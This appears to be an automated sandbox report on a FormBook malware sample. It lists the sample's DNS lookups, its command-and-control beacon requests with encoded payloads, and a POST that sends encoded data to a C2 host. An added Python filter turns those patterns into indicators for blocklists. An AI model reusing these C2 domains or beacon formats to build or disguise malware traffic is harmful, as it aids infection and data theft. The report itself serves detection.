Source: Network traffic. Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49768 -> 52.60.87.163:80
                Source: DNS query: www.6822662.xyz
                Source: DNS query: www.lingdianyun29.xyz
Source: Joe Sandbox View. IP address: 162.0.215.33
Source: Joe Sandbox View. IP address: 104.18.73.116
Source: Joe Sandbox View. ASN name: ACPCA
Source: Joe Sandbox View. ASN name: CLOUDFLARENETUS
Source: Joe Sandbox View. ASN name: CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co., Ltd.
Source: unknown. UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: global traffic. HTTP traffic detected:
  GET /cs9k/?Ebfx6=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZBVouQbNz2bSzCzmmREJaSGclyy3fj8=&Njld=LDTtwxbX2vi0G HTTP/1.1
  Host: www.holytur.net
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /30le/?Ebfx6=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERU+xtauim+BahOPB0GJcVol5yfYldYk=&Njld=LDTtwxbX2vi0G HTTP/1.1
  Host: www.nieuws-july202488.sbs
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8= HTTP/1.1
  Host: www.losmason.shop
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0G HTTP/1.1
  Host: www.hayaniya.org
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /rxts/?Ebfx6=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmG95haE2aMKVRHbzfzsbYvt06DCBrRY=&Njld=LDTtwxbX2vi0G HTTP/1.1
  Host: www.lovel.shop
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /zs4o/?Ebfx6=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWs9osNHqTA3jhptZMXJwhZ2LicMQ2+w=&Njld=LDTtwxbX2vi0G HTTP/1.1
  Host: www.duskgazes.work
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /xyvr/?Njld=LDTtwxbX2vi0G&Ebfx6=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrpZ66ZcdvUt/dXVK/m2TWNblWa9AhcM= HTTP/1.1
  Host: www.zrinorem-srumimit.sbs
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /dnjw/?Ebfx6=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfBLCVUFvihPDLt9byicPXxQNcd7bh2g=&Njld=LDTtwxbX2vi0G HTTP/1.1
  Host: www.6822662.xyz
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /404o/?Njld=LDTtwxbX2vi0G&Ebfx6=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsICWCsVDGGe9oFVLx/4b7CRN5YGXwG8= HTTP/1.1
  Host: www.lingdianyun29.xyz
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic. HTTP traffic detected:
  GET /d5up/?Ebfx6=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGpFc29QbO/AvwrqpPk1c7Mdu4vpn2Z4=&Njld=LDTtwxbX2vi0G HTTP/1.1
  Host: www.learnnow.info
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global traffic | DNS traffic detected: DNS query: www.holytur.net
                Source: global traffic | DNS traffic detected: DNS query: www.nieuws-july202488.sbs
                Source: global traffic | DNS traffic detected: DNS query: www.losmason.shop
                Source: global traffic | DNS traffic detected: DNS query: www.hayaniya.org
                Source: global traffic | DNS traffic detected: DNS query: www.lovel.shop
                Source: global traffic | DNS traffic detected: DNS query: www.duskgazes.work
                Source: global traffic | DNS traffic detected: DNS query: www.zrinorem-srumimit.sbs
                Source: global traffic | DNS traffic detected: DNS query: www.6822662.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.lingdianyun29.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.learnnow.info
                Source: global traffic | DNS traffic detected: DNS query: www.carpentry.club
                Source: unknown | HTTP traffic detected:
                    POST /30le/ HTTP/1.1
                    Host: www.nieuws-july202488.sbs
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate
                    Connection: close
                    Content-Length: 202
                    Cache-Control: max-age=0
                    Content-Type: application/x-www-form-urlencoded
                    Origin: http://www.nieuws-july202488.sbs
                    Referer: http://www.nieuws-july202488.sbs/30le/
                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Data Raw: 45 62 66 78 36 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 67 4a 65 35 64 58 45 46 70 45 32 49 67 50 58 47 6e 79 32 78 79 75 35 31 50 58 53 64 68 46 6b 49 6a 7a 62 30 4f 54 36 2b 4c 6c 6c 35 6d 35 55 59 7a 51 42 71 66 36 6b 4e 52 4f 55 61 76 56 37 73 4f 6f 62 68 69 6d 4b 30 65 6b 6e 49 41 6b 2b 69 6c 36 61 65 6e 4d 49 76 38 64 50 43 31 32 4a 4e 65 70 30 36 32 2f 70 35 4c 59 74 65 6f 6e 69 44 56 6c 31 35 67 45 67 44 79 45 6c 2b 32 38 41 58 51 6f 33 32 75 30 48 7a 53 4b 6f 78 79 72 51 71 38 66 62 43 53 75 45 52 35 56 71 34 79 71 56 53 68 37 2f 64 42 77 43 6d 70 62 35 66 64 42 6f 39 74 72 55 47 70 67 3d 3d
                    Data Ascii: Ebfx6=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSuER5Vq4yqVSh7/dBwCmpb5fdBo9trUGpg==
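The request side of this capture has one shape throughout: a four-character directory (/s15n/, /yf1h/, /rxts/, ...), a query of exactly two parameters whose order varies, one of them the same 13-character value on every host (Njld=LDTtwxbX2vi0G) and the other a long base64 blob, a fixed Android/ZTE User-Agent, Connection: close, and a different Host each time; the transaction on www.nieuws-july202488.sbs then POSTs a single base64 parameter of the same form (Content-Length 202) to a path of the same shape. The DNS list is the superset: www.holytur.net and www.carpentry.club are resolved but no HTTP request to them appears in this section. The script below is an added example for this report, not Joe Sandbox code; it turns that observation into a proxy-log filter that flags matching transactions and aggregates hosts, paths, the shared token and the User-Agent into an IOC set. The request data is copied from the report; the www.example.com transaction is constructed so the filter has something to reject, and the thresholds (four-character path, 10 to 16 character token, 64-plus character blob) are assumptions tuned to what this report shows rather than a FormBook specification. The one non-obvious implementation choice is splitting the query by hand: urllib.parse.parse_qsl decodes + as a space and would corrupt the base64 values.

```python
"""Filter FormBook-shaped HTTP transactions and aggregate them into IOCs.

Added example for this report, not Joe Sandbox code. The request data below is
copied from the report; the benign transaction at the end of the sample list and
the matching thresholds are assumptions made for the example.
"""
import json
import re

# User-Agent string carried by every request in the report.
UA = ("Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) "
      "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30")

# (method, request target, Host header, User-Agent, body). The www.example.com
# entry is constructed so the filter has something to reject.
SAMPLE_TRANSACTIONS = [
    ("GET", "/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8=",
     "www.losmason.shop", UA, ""),
    ("GET", "/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0G",
     "www.hayaniya.org", UA, ""),
    ("GET", "/rxts/?Ebfx6=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmG95haE2aMKVRHbzfzsbYvt06DCBrRY=&Njld=LDTtwxbX2vi0G",
     "www.lovel.shop", UA, ""),
    ("GET", "/xyvr/?Njld=LDTtwxbX2vi0G&Ebfx6=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrpZ66ZcdvUt/dXVK/m2TWNblWa9AhcM=",
     "www.zrinorem-srumimit.sbs", UA, ""),
    ("POST", "/30le/", "www.nieuws-july202488.sbs", UA,
     "Ebfx6=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSuER5Vq4yqVSh7/dBwCmpb5fdBo9trUGpg=="),
    ("GET", "/index.html?lang=en", "www.example.com", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", ""),
]

# Shape thresholds tuned to what the report shows (assumptions, not a FormBook spec).
PATH_RE = re.compile(r"/[a-z0-9]{4}/")              # /s15n/, /yf1h/, /30le/ ...
TOKEN_RE = re.compile(r"[A-Za-z0-9]{10,16}")        # the short value repeated on every GET
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")   # long base64-looking payload


def split_form(data):
    """Split key=value pairs without decoding '+' to a space. urllib.parse.parse_qsl
    performs that decoding and would corrupt the base64 values seen here."""
    pairs = []
    for part in data.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def classify(method, target, host, ua, body=""):
    """Return a record for a FormBook-shaped transaction, or None for anything else."""
    path, _, query = target.partition("?")
    if not PATH_RE.fullmatch(path):
        return None
    if method == "GET":
        values = [v for _, v in split_form(query)]
        tokens = [v for v in values if TOKEN_RE.fullmatch(v)]
        blobs = [v for v in values if BLOB_RE.fullmatch(v)]
        if len(values) != 2 or len(tokens) != 1 or len(blobs) != 1:
            return None
        return {"kind": "get-beacon", "host": host, "path": path,
                "token": tokens[0], "blob_len": len(blobs[0]), "ua": ua}
    if method == "POST":
        params = split_form(body)
        if len(params) != 1 or not BLOB_RE.fullmatch(params[0][1]):
            return None
        return {"kind": "post-beacon", "host": host, "path": path,
                "token": None, "blob_len": len(params[0][1]), "ua": ua}
    return None


def parse_raw_request(raw):
    """Turn a raw HTTP/1.1 request (e.g. carved from a pcap) into classify() arguments."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers.get("host", ""), headers.get("user-agent", ""), body


def extract_iocs(transactions):
    """Aggregate matched transactions into a blocklist-ready IOC set."""
    hits = [r for r in (classify(*t) for t in transactions) if r]
    return {
        "hit_count": len(hits),
        "hosts": sorted({r["host"] for r in hits}),
        "get_hosts": sorted({r["host"] for r in hits if r["kind"] == "get-beacon"}),
        "post_hosts": sorted({r["host"] for r in hits if r["kind"] == "post-beacon"}),
        "paths": sorted({r["path"] for r in hits}),
        "tokens": sorted({r["token"] for r in hits if r["token"]}),
        "user_agents": sorted({r["ua"] for r in hits}),
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_TRANSACTIONS), indent=2))
```

Feed pcap-carved requests through parse_raw_request, or proxy log fields straight into classify. FormBook is known to iterate through a domain list that mixes decoys with the live C2, and the 404 answers from ordinary nginx, LiteSpeed and Apache front ends do not tell the two apart, so the whole host set is the indicator for this sample; the shared token is what ties the hosts to one infection rather than to one another.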
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 07:43:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 09 Dec 2024 07:43:36 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 
00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 09 Dec 2024 07:43:38 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 
00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 09 Dec 2024 07:43:41 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 